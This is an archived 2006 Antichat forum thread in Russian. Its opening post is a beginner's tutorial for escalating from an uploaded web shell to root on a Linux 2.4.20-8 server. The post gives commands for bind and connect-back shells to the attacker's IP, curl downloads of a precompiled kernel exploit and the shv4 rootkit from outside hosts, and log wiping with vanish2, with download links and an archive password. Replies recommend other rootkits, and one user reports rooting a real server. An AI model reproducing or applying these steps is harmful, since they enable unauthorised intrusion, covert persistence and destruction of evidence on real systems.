Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   R00t me №1 (https://forum.antichat.xyz/showthread.php?t=17581)

Desr0w 12.04.2006 19:36

R00t me №1
 
Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии.
Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями...
Итак – мы залили шелл. Что же делать дальше?

Отдаём первую команду:
Код:

uname –a
Что же мы видим?
Linux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8.
Погнали)
Для начала проделаем следующие шаги:
1)
Код:

cd /tmp
 mkdir logs
 cd logs

2)Cливаем: bind.pl
Код:

chmod +x bind.pl
perl bind.pl

Запускаем: netcat
Код:

nc sitename 32767
Где sitename -ваш сайт.
При открытии окна командуем: id.Работает?
Отлично)
Но межет и не работать если фаер фильтрует соединение(
Тогда скачиваем
Connect-Back Backdoor (bd.c)
Код:

chmod +x bd.c
gcc db.c –o bd

После чего ставим netcat на прослушку 4000-ого порта:
Код:

-l –p 4000
И запускаем бекдор:
Код:

./db 127.0.0.1

Где 127.0.0.1 ваш реальный ip.
И вот в окошке появилась надпись - Connected to CommandLine...
Приступим к решительным действиям:
Скачиваем сплойт для этой версии ядра-вполне должен подойти
mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил.
Скачиваем уже cкомпилированный сплойт:
Код:

curl  http://xpl.netmisphere2.com/xpl_brk
chmod +x  xpl_brk
./ xpl_brk
id
uid=0(root) gid=0(root)

Отлично.Мы добись того чего хотели,но это только пол дела.
http://img286.imageshack.us/img286/4...62020245gg.png
Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4
Код:

curl http://splo1t.narod.ru/rootkits/shv4.tar.gz
tar xzf shv4.tar.gz
cd shv4
chmod +x setup
./setup pass  4321

*где pass(пароль) и 4321(порт) ваши значения. Во избежание проблем не советую вешать на высокий порт.
Заходит в putty указываем сайт, порт и конектимся.
Имя root,а пароль тот что вы указали при настройке. В моём случае это pass.
Зашли?

Выполняем команду:
Код:

nestat -an
Как видите заданный порт не где не светится,а значит мы освободили себя от зоркого глаза админа:)
Осталось, почистить логи.
Скачиваем один из лучших клинеров под *nix
-vanish2
Код:

chmod +x vanish2.
Собираем
Код:

gcc vanish2.c –o vanish
Запускаем:
Код:

./vanish root name_site 127.0.0.1
*Где 127.0.0.1 ваш реальный ip.
Видим надпись:
V_A_N_I_S_H_E_D_! Которая не может не радовать глаз.
_ _ _ _ _ _ _ _ _ _ _ _ _ _
На этом моя статейка кончается-надеюсь она поможет новичкам...
Ссылки:
r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt
Netcat:http://pro-hack.ru/download/s_nettools_2.html
bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt
Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar
xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar
shv4: http://desrow.narod.ru/rootkits/shv4_.rar
Putty: http://pro-hack.ru/download/s_nettools_4.html
vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz
For any link pass:antichat
=====[ Desr0w | | 12.04.2006 ]=====

Mobile 12.04.2006 19:43

Молодец, хорошая статья.

vectorg 12.04.2006 19:58

ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...

limpompo 12.04.2006 20:00

Как раз для новичков =) Нормуль!

+toxa+ 12.04.2006 20:37

Хорошая статья.... кста, в Nfm уже сразу сплойты есть.... скачиваются сразу скомпиленными.....

evil_packman 12.04.2006 20:51

хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании.
советую лучше suckit http://packetstormsecurity.org/UNIX/...sk-1.3a.tar.gz
тока собирается он не всегда.
или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147

или смотрим руткиты на этой паге http://www.eviltime.com/download.php...bpage=rootkits

+toxa+ 12.04.2006 20:58

А почему бы не сразу СЮДА?))

Desr0w 12.04.2006 21:04

Цитата:

Сообщение от VectorG
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...

Ну я ж сказал для тех кто умеет юзать хотя бы веб-шелл.По идеи они должны знать эти команды.
Ну мне не сложно:
pwd
Эта команда выводит на экран полный путь к текущему каталогу.
В любой момент можно узнать где вы находитесь.


ls

Команда ls выводит список файлов и подкаталога.
По умолчанию файлы начинающиеся с точки (.) скрываются.
Чтобы их увидеть надо добавить ключ -a:
ls -a
Для полной инфы от папках и файлах и ссылках:
ls -al
Хотим просмотреть файлы в других дирах:
Код:

ls -al /tmp

cd
команда позволяет сменить текщий каталог:
Код:

cd /tmp/bbb
и вы уже в папке bbb
например в каталоге bbb есть подкаталог bb-перейдём в него.
Код:

cd bb
Если нужно переместится на каталог выше:
Код:

cd ..
mkdir
Создание директории.
Например:
Код:

mkdir antichat
rm
Удаление файлов.
Для удаления директорий нужны след. ключи:
-d -- удалить директорию.
-r -- удалять содержимое директорий.
-f --не спрашивать подтверждение на удаление.
Код:

rm -rf /tmp/bbb/antichat
- так мы удалим дирикторию antichat.

tar
В никсах нет винрара:)
Архивы поставляются в виде tar.gz
Разархивируем:
Код:

tar xzvf namefile.tar.gz
which
Команда предназначена для того,чтобы узнать каталог в котором находится программа.
Мы например узнаём какая качалка стоит на серве.
Пример:
Код:

which ls 
/usr/bin/ls

Ну вот вроде все команды использованные в статье.
А..И еще немного о качалках:
Самая распространенная -wget
есть еще:
curl
fetch

lynx
links
GET


зы:
uname -a
показывает версию системы и еще кое что.

id -показывает ваши права.

hostname

показывает имя сайта.
есть ключ -i
Код:

hostname -i
покажет ip данного сайта.
The end.

Desr0w 12.04.2006 21:34

Описание руткитов:тут

KEZ 12.04.2006 23:11

неплохо молодец

Desr0w 12.04.2006 23:26

Kez,приятно слышать это от тебя!
Чесно так думаешь?

KEZ 12.04.2006 23:33

да я действительно так думаю....

Desr0w 12.04.2006 23:52

Сори за оффпот.
Kez,отписал-что не отвечаешь.
Ты бы асю еще свою дал;)

vectorg 13.04.2006 00:10

Вот теперь всё на своих местах :) надеюсь не будет никаких глупых вопросов от нубов типа: "что такое ls, как разархивировать архив, как посмотреть открытые порты..."

Из этой статьи больше понравилась часть про руткиты, хороший обзор, много интересного, побольше бы таких статей про sql, тогда бы было ВСЁ супер!

Desr0w 13.04.2006 00:16

Скоро думаю написать про установку всего нужного софта и т.д.
Мелочь конечно,но думаю после прочтения этой статьи и просмотра видео кому то понадобится...
Естественно всё будет написано в жанре для новичков:)

vectorg 13.04.2006 00:18

мелочь конечно, но в первом посте 2 раза упомянуто... ;)

Br0nek 13.04.2006 01:02

Я очень много нового узнал ;) Молодец Дес ! Так держать, жду следущих материалов ...

gr3yh47 13.04.2006 04:27

Desr0w
зачем делать так:
cd /tmp
mkdir logs
cd logs
если все можна в 1ну строку через ;
далее
chmod +x bind.pl
perl bind.pl
&
chmod +x bd.c
gcc db.c –o bd
зачем??? ты знаешь значение +x ???

почитай маны по tar & hostname а курсы у тебя наверное не очень =)

ps: статья отстой! даже для новичков! не в обиду брат!

Desr0w 13.04.2006 05:00

Буду признателен,если мемберы/модеры поставят этому доброму человеку пару десятков минусов.Думаю есть за что.При -10 автобан работает?
Не понимаю я таких людей:
Вот я писал-старался...Всё оценили данную статью,как хороший мануал для новичков.
Но вот появляется борзый новичёк и обсирает мою статью и меня.Зачем это человеку надо?
Ну может он второй Кевин Митник или кто другой,если считает что эта статья плоха даже для новичков...
своими словами обламываешь так?
А может он просто набиваешь посты т.к кроме критики и мата нечего больше ответить. :)
гг

Morph 13.04.2006 07:53

угу спасиба как роаз вчера все мозги себе проебал с этой байдой.

Morph 13.04.2006 07:55

точнее с этим проблем не было написанно версия такая то а сплойт не хочит запускаться пишет
[-] Unable to attach: Operation not permitted
/bin/sh: line 9: 8931 Killed ./ads

где ads сплойт.
грят версия не падходит.

SanyaX 13.04.2006 08:20

У меня такая проблемка была часто. Запускаю bind.pl всё вроде ок. Пjтом не могу приконектиться на указанный порт. А про статью нормал. Про +x помойму это добавляються права файла на запуск.

Desr0w 13.04.2006 09:03

Цитата:

Сообщение от SanyaX
У меня такая проблемка была часто. Запускаю bind.pl вссё вроде ок. ПОтом не могу приконектиться на указанный порт. КЕЗ тебе аську не даст точно говорю. Он в ней не сидит. А про статью нормал. gr3yh47 А ты мудак полный обсираешь тех кто выше тебя.
Тебе место бан. Про +x помойму это добавляються права файла на запуск.

C bind.pl праблы имхо из-за того что фаер фильтрует входящие соединения.
С KEZ'ом разобрались-отличный парень:)

Цитата:

Про +x помойму это добавляються права файла на запуск.
Ага,только не пойму почему этот дятел меня об этом спросил:)
Morph,рад что помог.
А насчёт
Код:

[-] Unable to attach: Operation not permitted
/bin/sh: line 9: 8931 Killed ./ads

Думаю что мож какая система защиты убивает,хотя может и версия...

Morph 13.04.2006 15:45

Спасиба рута взял первого в своей жизни повесил в оправдание в своей подписи :)
Кароче спасиба делал не как ты но сплойт помог спасиба!
Другие какие не пробовал все такой ошибкой и тухли =\

АГРОМНОЕ СПАСИБА!

Desr0w 13.04.2006 19:35

Цитата:

Сообщение от gr3yh47
Desr0w
зачем делать так:
cd /tmp
mkdir logs
cd logs
если все можна в 1ну строку через ;
далее
chmod +x bind.pl
perl bind.pl
&
chmod +x bd.c
gcc db.c –o bd
зачем??? ты знаешь значение +x ???

почитай маны по tar & hostname а курсы у тебя наверное не очень =)

ps: статья отстой! даже для новичков! не в обиду брат!

Уважаемый к чему такая грубая не заслуженная критика?
Я знаю что команды можно писть через ; ,но я уверен
что для новичков будет более понятнее если команды будут написаны по очерёдно.
Что зачем??Я знаб значение chmod +x - права на исполнение.Как ты запустишь бедор если нет прав на запуск,а?
Маны по по tar & hostname ,а зачем?
Я что написал не привильно по этим командам?
Обьясни плз.
*для тебя-описание команды hostname занимает две строчки.У тебя что маны по две страницы для ...
Какие курсы?
P.s-статья хорошая,как мануал для новичков и всё тебе это скажут.
И чисто по человечески-ты мне не брат,**** super man.

=Be$= 14.04.2006 00:27

Молодец !!+

GreenBear 14.04.2006 00:37

Молоток прям

Morph 14.04.2006 14:12

тама оказываеться все путем было, спйлоты убивались а версия правильная была все мозги с некотороми проипал кто еще "дурак" оказываеться.....

Micr0b 14.04.2006 14:25

За статю +...

dim_ok 14.04.2006 19:25

Цитата:

Сообщение от Desr0w
Я знаб значение chmod +x - права на исполнение.Как ты запустишь бедор если нет прав на запуск,а?

в данном случае chmod +x не обязателен, ты указываешь компилятору имя файла, а там без разницы какие права, главное чтоб на чтение были, а после компиляции он сам права на исполнение поставит, с перлом тоже не нужно, если запускаешь тип perl script.pl
Ну и ещё не понравилась манера делать back connect'ы на свой реальный ip. Для этого лучше использовать шеллы, а так статья ничего

Desr0w 14.04.2006 20:40

Цитата:

Сообщение от dim_ok
в данном случае chmod +x не обязателен, ты указываешь компилятору имя файла, а там без разницы какие права, главное чтоб на чтение были, а после компиляции он сам права на исполнение поставит, с перлом тоже не нужно, если запускаешь тип perl script.pl
Ну и ещё не понравилась манера делать back connect'ы на свой реальный ip. Для этого лучше использовать шеллы, а так статья ничего

Хм...ПРоверил на шелле-ты прав.
Например в видео с некого журнула чьёму сайту "Сломали нос" всегда после скачки сплойта дают права на исполнение после того как компилить...
Спасибо буду знать,хоть это и мелочь.

iNcluDe 14.04.2006 21:48

Хорошая статья, мне понравилась

Desr0w 16.04.2006 08:53

Эх Kez,Kez...
Вот хотел я писать статью R00t me №2 типа установка всего необходимого софта и работа с ним...
Сделав на 60-65% заметил твой обзор:
http://forum.antichat.ru/thread8274.html
Всё не будет стаьи кез всё разобрал(
Жаль что раньше не увидел-только время на неё убил.
Вот.

Morph 16.04.2006 09:09

народ хелп )))
я кароч поставил руткит этот воть а у меня на нем пароль какая то сцука сменила админ поидее бы нверное бы его бы убил а не пароль менял.
чо то у меня такое ощущение что тама кто то кроме меня еще есть.
вот такой мой первый опыт )))

Desr0w 16.04.2006 09:29

Morph,ты shv4 ставил?
Имхо на shv4 сметить пасс нельзя...
Есть два варианта:
1)ты не правильно пасс пишешь или просто приконектился случайно на стандартный порт и пытаешься зайти под настоящим админом.
2)Твой руткит удалил хакер и поставил свой ,что я сомневаюсь- т.к он бы 100 % перевесил на другой порт.
Думаю причина №1 больше вероятна.
Пробни еше раз зацепится на тот порт ,на который вешал и ввести пароль не торопясь(можно раскладку клавы пробить;)
Удачи.

Morph 16.04.2006 10:14

Спасиба но все я правильно делаю все на тот же порт конечусь и пароль не правильный :(
То есть возможно что был поставлен руткит другим челом чтоли?
Именно на этот порт да?
И пароль сменился мой на его?

А если я щас заного поставлю этот руткит и установлю его заного но на другой порт повешу? Этот руткит старый на котором пароль не подходит он не удалиться?
Ну тоесть возможно ли чтобы на 1 тачке весело два одинаковых руткита? но висело на разных портах и на разных паролях?

Morph 16.04.2006 10:15

Тьфу блин )
Ну то есть два руткита но на разных портах и один другого не трогал?

Morph 16.04.2006 10:19

Кстати каким макаром руткит удалить то?

Desr0w 16.04.2006 12:20

НУ и нафлуди ты:)
Два руткита врятли,т.к он подменяет системные файлы своими.Т.е не может быть 2 пары подменённых системных файлов,да и ядру наверно сразу бошнб снёсёт и оно упадёт.
Удалить скрипт можно только возвратом системных файлов...
Корочь у тебя бредовая совсем ситуация..Посмотрим что скажут другие знающие я уже всё вроде сказал...

Morph 16.04.2006 12:49

то есть ничего не зделать?
хмм блин =\


Время: 01:20